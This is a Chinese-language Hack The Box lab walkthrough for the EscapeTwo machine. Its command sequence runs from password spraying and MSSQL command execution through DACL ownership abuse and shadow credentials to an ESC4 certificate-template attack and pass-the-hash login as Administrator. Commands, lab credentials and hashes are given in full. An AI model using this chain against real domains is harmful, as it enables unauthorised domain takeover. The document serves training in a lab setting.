HTB:EscapeTwo

admin 2025年3月13日13:28:44评论21 views字数 9975阅读33分15秒阅读模式
劝君多采撷,此物最相思

本次靶机为HTB的一个简单难度的靶机Vintage,复现的过程中出现了问题,还请多还原一下靶机,如果哪里做的不太对,还请师傅们提出

HTB:EscapeTwo
image-20250306235934154

已有信息为

rose/KxEPkKe6R8su
HTB:EscapeTwo
image-20250308131051037

我们使用nmap进行端口扫描

nmap -sT -p- -T5 -A -Pn 10.10.11.51

白小羽

Tips:如果发现端口扫描的慢的话,要用代理比如小猫,kali代理到小猫的那个端口,修改proxychains的配置文件 /etc/proxychains4.conf 然后 proxychains openvpn lab_xxxxx.ovpn 挂到后台就行

HTB:EscapeTwo
image-20250308152428169
HTB:EscapeTwo
image-20250308223513966

修改hosts

echo "10.10.11.51 sequel.htb" | sudo tee -a /etc/hosts

尝试一个基本的smb枚举(已知信息),看看是否能登录成功

┌──(root㉿kali)-[/data/demo]└─# crackmapexec smb sequel.htb -u rose -p KxEPkKe6R8su --computersSMB         sequel.htb      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)SMB         sequel.htb      445    DC01             [+] sequel.htbrose:KxEPkKe6R8suSMB         sequel.htb      445    DC01             [+] Enumerated domain computer(s)SMB         sequel.htb      445    DC01             sequel.htbDC01$

枚举smb服务器共享信息

smbmap -u 'rose' -p 'KxEPkKe6R8su' -H 10.10.11.51
HTB:EscapeTwo
image-20250309122823387

使用smbclient登录

┌──(root㉿kali)-[/data/demo]└─# smbclient //sequel.htb/Users -U sequel.htb\rosePassword for [SEQUEL.HTBrose]:Try "help" to get a list of possible commands.smb: > dir   .                                  DR        0  Sun Jun  909:42:112024  ..                                 DR        0  Sun Jun  909:42:112024  Default                           DHR        0  Sun Jun  907:17:292024  desktop.ini                       AHS      174  Sat Sep 1503:16:4820186367231 blocks of size 4096.880750 blocks availablesmb: >┌──(root㉿kali)-[~]└─# smbclient //sequel.htb/'Accounting Department' -U sequel.htb\rosePassword for [SEQUEL.HTBrose]:Try "help" to get a list of possible commands.smb: > dir  .                                   D        0  Sun Jun  906:52:212024  ..                                  D        0  Sun Jun  906:52:212024  accounting_2024.xlsx                A    10217  Sun Jun  906:14:492024  accounts.xlsx                       A     6780  Sun Jun  906:52:0720246367231 blocks of size 4096.871029 blocks availablesmb: >

参数解释

smbclient : 这是一个用于与SMB/CIFS(Common Internet File System)服务器进行交互的命令行工具。它可以用来浏览共享资源、上传/下载文件等操作。

//sequel.htb/Users : // 这是目标SMB共享的起始路径,sequel.htb是目标主机的域名或IP地址,Users 是共享资源的名称,通常表示存储用户文件的共享文件夹。

-U sequel.htb\rose : -U参数用于指定连接时使用的用户名,sequel.htb工作组/域,rose具体的用户名

执行该命令后,系统通常会提示输入 rose 用户的密码。输入正确的密码后,用户将能够访问 Users 共享中的文件和目录,类似于在文件资源管理器中访问网络共享。

我们登录到Accounting Department这个smb服务器的时候发现了两个xlsx表格文件,我们尝试将这个文件下载下来

我们使用get命令下载这两个文件

HTB:EscapeTwo
image-20250309123641170

此时得到了密码信息

HTB:EscapeTwo
image-20250309124646149
angela/0fwz7Q4mSpurIt99oscar/86LxLBMgEWaKUnBGkevin/Md9Wlq1E5bZnVDVosa/MSSQLP@ssw0rd!

有一个sa账户,像是mssql的用户名和密码,并且1433端口也是开启的(待会会用上)

HTB:EscapeTwo
image-20250309124941442

我们将上面的密码保存到一个txt文件中,枚举域内用户

echo '0fwz7Q4mSpurIt9986LxLBMgEWaKUnBGMd9Wlq1E5bZnVDVoMSSQLP@ssw0rd!' > pass.txt netexec ldap 10.10.11.51 -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
HTB:EscapeTwo
image-20250309132349044

将用户名保存到user.txt

AdministratorGuestkrbtgtmichaelryanoscarsql_svcroseca_svc

此时你的目录下面有这四个文件

┌──(root㉿kali)-[/data/demo]└─# lsaccounting_2024.xlsx  accounts.xlsx  pass.txt  user.txt

就接下来使用密码喷洒

HTB:EscapeTwo
image-20250309133631227

得到账号密码信息

oscar86LxLBMgEWaKUnBG

通过 WinRM(Windows Remote Management)协议对目标主机 10.10.11.51 进行身份验证

nxc winrm 10.10.11.51 -u 'oscar' -p '86LxLBMgEWaKUnBG'
HTB:EscapeTwo
image-20250309140730374

利用mssql执行系统命令

netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'whoami'
HTB:EscapeTwo
image-20250309141010674

利用dir进行目录遍历,发现一个sql2019,应该是mssql的目录

netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:/'
HTB:EscapeTwo
image-20250309141237785

继续遍历

netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'
HTB:EscapeTwo
image-20250309141848026

发现一个sql-Configuration.INI文件

netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'
HTB:EscapeTwo
image-20250309142154285

查看文件内容

netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'type c:SQL2019ExpressAdv_ENUsql-Configuration.INI'
HTB:EscapeTwo
image-20250309142355777

发现两个东西

SQLSVCPASSWORD="WqSZAF6CysDQbGb3"SQLSVCACCOUNT="SEQUELsql_svc"

参数介绍

SQLSVCACCOUNT表示 SQL Server 服务将在一个名为 sql_svc 的域账户下运行。

SQLSVCPASSWORD 是 SQLSVCACCOUNT 账户的密码

再次进行密码喷洒

 netexec mssql 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
HTB:EscapeTwo
image-20250309144239248

得出两个凭证,测试哪个能利用winrm进行登录

netexec winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success
HTB:EscapeTwo
image-20250309144352974

得出一个结果ryan用户能使用远程登录

evil-winrm -i 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3'
HTB:EscapeTwo
image-20250309144544624

切换到ryan的桌面,找到第一个flag

HTB:EscapeTwo
image-20250309154721075

提权

域内信息收集

HTB:EscapeTwo
image-20250309155840236

使用netexec枚举靶机域内信息

netexec ldap 10.10.11.51 -d sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' --dns-server 10.10.11.51 --bloodhound -c All
HTB:EscapeTwo
image-20250309161239894

bloodhound 用于分析和可视化域内的用户、组、计算机、权限关系等数据,帮助安全研究人员或攻击者快速发现攻击路径和权限提升机会。下载

HTB:EscapeTwo
Описание изображения

由图标可见,ryan用户对ca_svc用户具有WriteOwner权限

查看ca_svc用户信息

net user ca_svc /domain
HTB:EscapeTwo
image-20250309211414090

由输出可见,该用户属于Cert Publishers

使用bloodyAD将ca_syc用户拥有者修改为ryan用户

┌──(root㉿kali)-[/data/windows_atk/script]└─# bloodyAD -d sequel.htb --dc-ip 10.10.11.51 --dns 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'[+] Old owner S-1-5-21-548670397-972687484-3496335370-512is now replaced by ryan on ca_svc

使用 ryan 的凭据将 AD 对象 ca_svc 的所有者权限转移给 ryan,是典型的权限提升或后渗透操作。成功执行后,攻击者可完全控制 ca_svc 账户,进一步渗透域环境。

白小羽

这里如果失败的话呢,需要重置一下机器,因为可能是别人打过的

┌──(root㉿kali)-[/data/windows_atk/script]└─# python dacledit.py -action 'write' -principal 'ryan' -target 'ca_svc' 'sequel.htb/ryan:WqSZAF6CysDQbGb3'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] DACL backed up to dacledit-20250309-193835.bak[*] DACL modified successfully!

将本地时钟与靶机同步

sudo ntpdate 10.10.11.51

使用certipy-ad创建ca_svc用户影子证书,获得该用户NTLM密码哈希

certipy-ad shadow auto -u '[email protected]' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target sequel.htb -dc-ip 10.10.11.51 -ns 10.10.11.51

白小羽

账号:ca_svc

密码hash:3b181b914e7a9d5508ea1e20bc2b7fce

git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.gitcd .Ghostpack-CompiledBinariesupload Certify.exe.Certify.exe find /domain:sequel.htb
HTB:EscapeTwo
image-20250310085406767

由输出可见,该模板对Domain Admins具有注册权利,而且Cert Publishers对该模板具有完全控制权限,因此恶意利用该模板即可获取管理员密码哈希

HTB:EscapeTwo
image-20250310085458569

使用certipy-ad通过ca_svc哈希密码枚举靶机ADCS尝试发现该漏洞

┌──(root㉿kali)-[/data/windows_atk/script]└─# certipy-ad find -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdoutCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Trying to get CA configuration for'sequel-DC01-CA' via CSRA[!] Got error while trying to get CA configuration for'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.[*] Trying to get CA configuration for'sequel-DC01-CA' via RRP[*] Got CA configuration for'sequel-DC01-CA'[*] Enumeration output:Certificate Authorities0    CA Name                             : sequel-DC01-CA    DNS Name                            : DC01.sequel.htb    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3    Certificate Validity Start          : 2024-06-0816:50:40+00:00    Certificate Validity End            : 2124-06-0817:00:40+00:00    Web Enrollment                      : Disabled    User Specified SAN                  : Disabled    Request Disposition                 : Issue    Enforce Encryption for Requests     : Enabled    Permissions      Owner                             : SEQUEL.HTBAdministrators      Access Rights        ManageCertificates              : SEQUEL.HTBAdministrators                                          SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins        ManageCa                        : SEQUEL.HTBAdministrators                                          SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins        Enroll                          : SEQUEL.HTBAuthenticated UsersCertificate Templates0    Template Name                       : DunderMifflinAuthentication    Display Name                        : Dunder Mifflin Authentication    Certificate Authorities             : sequel-DC01-CA    Enabled                             : True    Client Authentication               : True    Enrollment Agent                    : False    Any Purpose                         : False    Enrollee Supplies Subject           : False    Certificate Name Flag               : SubjectRequireCommonName                                          SubjectAltRequireDns    Enrollment Flag                     : AutoEnrollment                                          PublishToDs    Private Key Flag                    : 16842752    Extended Key Usage                  : Client Authentication                                          Server Authentication    Requires Manager Approval           : False    Requires Key Archival               : False    Authorized Signatures Required      : 0    Validity Period                     : 1000 years    Renewal Period                      : 6 weeks    Minimum RSA Key Length              : 2048    Permissions      Enrollment Permissions        Enrollment Rights               : SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins      Object Control Permissions        Owner                           : SEQUEL.HTBEnterprise Admins        Full Control Principals         : SEQUEL.HTBCert Publishers        Write Owner Principals          : SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins                                          SEQUEL.HTBAdministrator                                          SEQUEL.HTBCert Publishers        Write Dacl Principals           : SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins                                          SEQUEL.HTBAdministrator                                          SEQUEL.HTBCert Publishers        Write Property Principals       : SEQUEL.HTBDomain Admins                                          SEQUEL.HTBEnterprise Admins                                          SEQUEL.HTBAdministrator                                          SEQUEL.HTBCert Publishers    [!] Vulnerabilities      ESC4                              : 'SEQUEL.HTB\Cert Publishers' has dangerous permissions

由末尾输出可见,利用该模板可导致ESC4漏洞攻击

certipy-ad template -u [email protected] -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug
HTB:EscapeTwo
image-20250310093806422

使用certipy-ad请求一份Administrator用户符合模板要求的证书

certipy-ad req -u [email protected] -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn [email protected] -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51
HTB:EscapeTwo
image-20250310093859224

使用certipy-ad借助pfx证书通过身份认证,使用impacket-psexec通过上述哈希凭证登录靶机

certipy-ad auth -pfx administrator_10.pfximpacket-psexec sequel.htb/[email protected] -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff'
HTB:EscapeTwo
image-20250310093503186

C:UsersAdministratorDesktop 找到root.txt文件

C:UsersAdministratorDesktop> type root.txt6ca10bc95839bb3243539e3d7ea4f362

至此,靶机渗透结束

 

原文始发于微信公众号(泷羽Sec):HTB:EscapeTwo

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月13日13:28:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB:EscapeTwohttps://cn-sec.com/archives/3826434.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息